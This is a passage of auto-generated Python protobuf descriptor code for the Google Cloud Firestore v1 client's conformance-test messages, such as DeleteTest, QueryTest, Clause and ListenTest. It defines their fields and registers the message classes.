enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_values",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.json_values",
index=3,
number=4,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.request",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.is_error",
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1509,
serialized_end=1762,
)
_DELETETEST = _descriptor.Descriptor(
name="DeleteTest",
full_name="google.cloud.firestore_v1.proto.DeleteTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.DeleteTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="precondition",
full_name="google.cloud.firestore_v1.proto.DeleteTest.precondition",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.DeleteTest.request",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.DeleteTest.is_error",
index=3,
number=4,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1765,
serialized_end=1927,
)
_SETOPTION = _descriptor.Descriptor(
name="SetOption",
full_name="google.cloud.firestore_v1.proto.SetOption",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="all",
full_name="google.cloud.firestore_v1.proto.SetOption.all",
index=0,
number=1,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="fields",
full_name="google.cloud.firestore_v1.proto.SetOption.fields",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1929,
serialized_end=2013,
)
_QUERYTEST = _descriptor.Descriptor(
name="QueryTest",
full_name="google.cloud.firestore_v1.proto.QueryTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="coll_path",
full_name="google.cloud.firestore_v1.proto.QueryTest.coll_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="clauses",
full_name="google.cloud.firestore_v1.proto.QueryTest.clauses",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="query",
full_name="google.cloud.firestore_v1.proto.QueryTest.query",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.QueryTest.is_error",
index=3,
number=4,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2016,
serialized_end=2175,
)
_CLAUSE = _descriptor.Descriptor(
name="Clause",
full_name="google.cloud.firestore_v1.proto.Clause",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="select",
full_name="google.cloud.firestore_v1.proto.Clause.select",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="where",
full_name="google.cloud.firestore_v1.proto.Clause.where",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="order_by",
full_name="google.cloud.firestore_v1.proto.Clause.order_by",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="offset",
full_name="google.cloud.firestore_v1.proto.Clause.offset",
index=3,
number=4,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="limit",
full_name="google.cloud.firestore_v1.proto.Clause.limit",
index=4,
number=5,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="start_at",
full_name="google.cloud.firestore_v1.proto.Clause.start_at",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="start_after",
full_name="google.cloud.firestore_v1.proto.Clause.start_after",
index=6,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="end_at",
full_name="google.cloud.firestore_v1.proto.Clause.end_at",
index=7,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="end_before",
full_name="google.cloud.firestore_v1.proto.Clause.end_before",
index=8,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="clause",
full_name="google.cloud.firestore_v1.proto.Clause.clause",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=2178,
serialized_end=2656,
)
_SELECT = _descriptor.Descriptor(
name="Select",
full_name="google.cloud.firestore_v1.proto.Select",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="fields",
full_name="google.cloud.firestore_v1.proto.Select.fields",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2658,
serialized_end=2726,
)
_WHERE = _descriptor.Descriptor(
name="Where",
full_name="google.cloud.firestore_v1.proto.Where",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="path",
full_name="google.cloud.firestore_v1.proto.Where.path",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="op",
full_name="google.cloud.firestore_v1.proto.Where.op",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_value",
full_name="google.cloud.firestore_v1.proto.Where.json_value",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2728,
serialized_end=2825,
)
_ORDERBY = _descriptor.Descriptor(
name="OrderBy",
full_name="google.cloud.firestore_v1.proto.OrderBy",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="path",
full_name="google.cloud.firestore_v1.proto.OrderBy.path",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="direction",
full_name="google.cloud.firestore_v1.proto.OrderBy.direction",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2827,
serialized_end=2913,
)
_CURSOR = _descriptor.Descriptor(
name="Cursor",
full_name="google.cloud.firestore_v1.proto.Cursor",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_snapshot",
full_name="google.cloud.firestore_v1.proto.Cursor.doc_snapshot",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_values",
full_name="google.cloud.firestore_v1.proto.Cursor.json_values",
index=1,
number=2,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2915,
serialized_end=3012,
)
_DOCSNAPSHOT = _descriptor.Descriptor(
name="DocSnapshot",
full_name="google.cloud.firestore_v1.proto.DocSnapshot",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="path",
full_name="google.cloud.firestore_v1.proto.DocSnapshot.path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_data",
full_name="google.cloud.firestore_v1.proto.DocSnapshot.json_data",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3014,
serialized_end=3060,
)
_FIELDPATH = _descriptor.Descriptor(
name="FieldPath",
full_name="google.cloud.firestore_v1.proto.FieldPath",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="field",
full_name="google.cloud.firestore_v1.proto.FieldPath.field",
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3062,
serialized_end=3088,
)
_LISTENTEST = _descriptor.Descriptor(
name="ListenTest",
full_name="google.cloud.firestore_v1.proto.ListenTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="responses",
full_name="google.cloud.firestore_v1.proto.ListenTest.responses",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="snapshots",
full_name="google.cloud.firestore_v1.proto.ListenTest.snapshots",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.ListenTest.is_error",
index=2,
number=3,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3091,
serialized_end=3239,
)
_SNAPSHOT = _descriptor.Descriptor(
name="Snapshot",
full_name="google.cloud.firestore_v1.proto.Snapshot",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="docs",
full_name="google.cloud.firestore_v1.proto.Snapshot.docs",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="changes",
full_name="google.cloud.firestore_v1.proto.Snapshot.changes",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="read_time",
full_name="google.cloud.firestore_v1.proto.Snapshot.read_time",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3242,
serialized_end=3405,
)
_DOCCHANGE = _descriptor.Descriptor(
name="DocChange",
full_name="google.cloud.firestore_v1.proto.DocChange",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="kind",
full_name="google.cloud.firestore_v1.proto.DocChange.kind",
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="doc",
full_name="google.cloud.firestore_v1.proto.DocChange.doc",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="old_index",
full_name="google.cloud.firestore_v1.proto.DocChange.old_index",
index=2,
number=3,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="new_index",
full_name="google.cloud.firestore_v1.proto.DocChange.new_index",
index=3,
number=4,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[_DOCCHANGE_KIND],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3408,
serialized_end=3632,
)
_TESTFILE.fields_by_name["tests"].message_type = _TEST
_TEST.fields_by_name["get"].message_type = _GETTEST
_TEST.fields_by_name["create"].message_type = _CREATETEST
_TEST.fields_by_name["set"].message_type = _SETTEST
_TEST.fields_by_name["update"].message_type = _UPDATETEST
_TEST.fields_by_name["update_paths"].message_type = _UPDATEPATHSTEST
_TEST.fields_by_name["delete"].message_type = _DELETETEST
_TEST.fields_by_name["query"].message_type = _QUERYTEST
_TEST.fields_by_name["listen"].message_type = _LISTENTEST
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["get"])
_TEST.fields_by_name["get"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["create"])
_TEST.fields_by_name["create"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["set"])
_TEST.fields_by_name["set"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["update"])
_TEST.fields_by_name["update"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["update_paths"])
_TEST.fields_by_name["update_paths"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["delete"])
_TEST.fields_by_name["delete"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["query"])
_TEST.fields_by_name["query"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["listen"])
_TEST.fields_by_name["listen"].containing_oneof = _TEST.oneofs_by_name["test"]
_GETTEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._GETDOCUMENTREQUEST
)
_CREATETEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_SETTEST.fields_by_name["option"].message_type = _SETOPTION
_SETTEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_UPDATETEST.fields_by_name[
"precondition"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2._PRECONDITION
)
_UPDATETEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_UPDATEPATHSTEST.fields_by_name[
"precondition"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2._PRECONDITION
)
_UPDATEPATHSTEST.fields_by_name["field_paths"].message_type = _FIELDPATH
_UPDATEPATHSTEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_DELETETEST.fields_by_name[
"precondition"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2._PRECONDITION
)
_DELETETEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_SETOPTION.fields_by_name["fields"].message_type = _FIELDPATH
_QUERYTEST.fields_by_name["clauses"].message_type = _CLAUSE
_QUERYTEST.fields_by_name[
"query"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_query__pb2._STRUCTUREDQUERY
)
_CLAUSE.fields_by_name["select"].message_type = _SELECT
_CLAUSE.fields_by_name["where"].message_type = _WHERE
_CLAUSE.fields_by_name["order_by"].message_type = _ORDERBY
_CLAUSE.fields_by_name["start_at"].message_type = _CURSOR
_CLAUSE.fields_by_name["start_after"].message_type = _CURSOR
_CLAUSE.fields_by_name["end_at"].message_type = _CURSOR
_CLAUSE.fields_by_name["end_before"].message_type = _CURSOR
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["select"])
_CLAUSE.fields_by_name["select"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["where"])
_CLAUSE.fields_by_name["where"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["order_by"])
_CLAUSE.fields_by_name["order_by"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["offset"])
_CLAUSE.fields_by_name["offset"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["limit"])
_CLAUSE.fields_by_name["limit"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["start_at"])
_CLAUSE.fields_by_name["start_at"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["start_after"])
_CLAUSE.fields_by_name["start_after"].containing_oneof = _CLAUSE.oneofs_by_name[
"clause"
]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["end_at"])
_CLAUSE.fields_by_name["end_at"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["end_before"])
_CLAUSE.fields_by_name["end_before"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_SELECT.fields_by_name["fields"].message_type = _FIELDPATH
_WHERE.fields_by_name["path"].message_type = _FIELDPATH
_ORDERBY.fields_by_name["path"].message_type = _FIELDPATH
_CURSOR.fields_by_name["doc_snapshot"].message_type = _DOCSNAPSHOT
_LISTENTEST.fields_by_name[
"responses"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._LISTENRESPONSE
)
_LISTENTEST.fields_by_name["snapshots"].message_type = _SNAPSHOT
_SNAPSHOT.fields_by_name[
"docs"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_document__pb2._DOCUMENT
)
_SNAPSHOT.fields_by_name["changes"].message_type = _DOCCHANGE
_SNAPSHOT.fields_by_name[
"read_time"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_DOCCHANGE.fields_by_name["kind"].enum_type = _DOCCHANGE_KIND
_DOCCHANGE.fields_by_name[
"doc"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_document__pb2._DOCUMENT
)
_DOCCHANGE_KIND.containing_type = _DOCCHANGE
DESCRIPTOR.message_types_by_name["TestFile"] = _TESTFILE
DESCRIPTOR.message_types_by_name["Test"] = _TEST
DESCRIPTOR.message_types_by_name["GetTest"] = _GETTEST
DESCRIPTOR.message_types_by_name["CreateTest"] = _CREATETEST
DESCRIPTOR.message_types_by_name["SetTest"] = _SETTEST
DESCRIPTOR.message_types_by_name["UpdateTest"] = _UPDATETEST
DESCRIPTOR.message_types_by_name["UpdatePathsTest"] = _UPDATEPATHSTEST
DESCRIPTOR.message_types_by_name["DeleteTest"] = _DELETETEST
DESCRIPTOR.message_types_by_name["SetOption"] = _SETOPTION
DESCRIPTOR.message_types_by_name["QueryTest"] = _QUERYTEST
DESCRIPTOR.message_types_by_name["Clause"] = _CLAUSE
DESCRIPTOR.message_types_by_name["Select"] = _SELECT
DESCRIPTOR.message_types_by_name["Where"] = _WHERE
DESCRIPTOR.message_types_by_name["OrderBy"] = _ORDERBY
DESCRIPTOR.message_types_by_name["Cursor"] = _CURSOR
DESCRIPTOR.message_types_by_name["DocSnapshot"] = _DOCSNAPSHOT
DESCRIPTOR.message_types_by_name["FieldPath"] = _FIELDPATH
DESCRIPTOR.message_types_by_name["ListenTest"] = _LISTENTEST
DESCRIPTOR.message_types_by_name["Snapshot"] = _SNAPSHOT
DESCRIPTOR.message_types_by_name["DocChange"] = _DOCCHANGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TestFile = _reflection.GeneratedProtocolMessageType(
"TestFile",
(_message.Message,),
dict(
DESCRIPTOR=_TESTFILE,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.TestFile)
),
)
_sym_db.RegisterMessage(TestFile)
Test = _reflection.GeneratedProtocolMessageType(
"Test",
(_message.Message,),
dict(
DESCRIPTOR=_TEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Test)
),
)
_sym_db.RegisterMessage(Test)
GetTest = _reflection.GeneratedProtocolMessageType(
"GetTest",
(_message.Message,),
dict(
DESCRIPTOR=_GETTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.GetTest)
),
)
_sym_db.RegisterMessage(GetTest)
CreateTest = _reflection.GeneratedProtocolMessageType(
"CreateTest",
(_message.Message,),
dict(
DESCRIPTOR=_CREATETEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.CreateTest)
),
)
_sym_db.RegisterMessage(CreateTest)
SetTest = _reflection.GeneratedProtocolMessageType(
"SetTest",
(_message.Message,),
dict(
DESCRIPTOR=_SETTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.SetTest)
),
)
_sym_db.RegisterMessage(SetTest)
UpdateTest = _reflection.GeneratedProtocolMessageType(
"UpdateTest",
(_message.Message,),
dict(
DESCRIPTOR=_UPDATETEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.UpdateTest)
),
)
_sym_db.RegisterMessage(UpdateTest)
UpdatePathsTest = _reflection.GeneratedProtocolMessageType(
"UpdatePathsTest",
(_message.Message,),
dict(
DESCRIPTOR=_UPDATEPATHSTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.UpdatePathsTest)
),
)
_sym_db.RegisterMessage(UpdatePathsTest)
DeleteTest = _reflection.GeneratedProtocolMessageType(
"DeleteTest",
(_message.Message,),
dict(
DESCRIPTOR=_DELETETEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.DeleteTest)
),
)
_sym_db.RegisterMessage(DeleteTest)
SetOption = _reflection.GeneratedProtocolMessageType(
"SetOption",
(_message.Message,),
dict(
DESCRIPTOR=_SETOPTION,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.SetOption)
),
)
_sym_db.RegisterMessage(SetOption)
QueryTest = _reflection.GeneratedProtocolMessageType(
"QueryTest",
(_message.Message,),
dict(
DESCRIPTOR=_QUERYTEST,
